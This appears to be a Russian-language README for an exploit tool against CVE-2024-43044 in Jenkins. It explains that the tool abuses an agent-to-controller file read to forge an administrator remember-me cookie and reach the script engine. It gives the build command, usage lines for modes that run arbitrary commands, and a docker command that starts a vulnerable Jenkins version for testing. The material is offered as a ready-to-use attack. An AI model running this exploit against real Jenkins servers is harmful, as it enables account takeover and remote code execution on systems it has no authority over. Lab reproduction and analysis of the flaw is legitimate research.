
Эксплойт для уязвимости CVE-2024-43044 в Jenkins
Это эксплойт для CVE-2024-43044 — произвольное чтение файлов, которое позволяет агенту получать файлы с контроллера.
Эксплойт использует уязвимость для чтения файлов с целью подделки remember-me cookie для учётной записи администратора и получения доступа к скриптовому движку Jenkins.
Полный разбор доступен по ссылке https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
mvn package
Использование эксплойта:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
Вы можете протестировать его на уязвимой версии с помощью docker:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
Как только у вас будет запущен Jenkins, настройте агента.
Соединение контроллер/агент может быть как стандартным (с использованием url, имени узла, секрета), так и через SSH.
.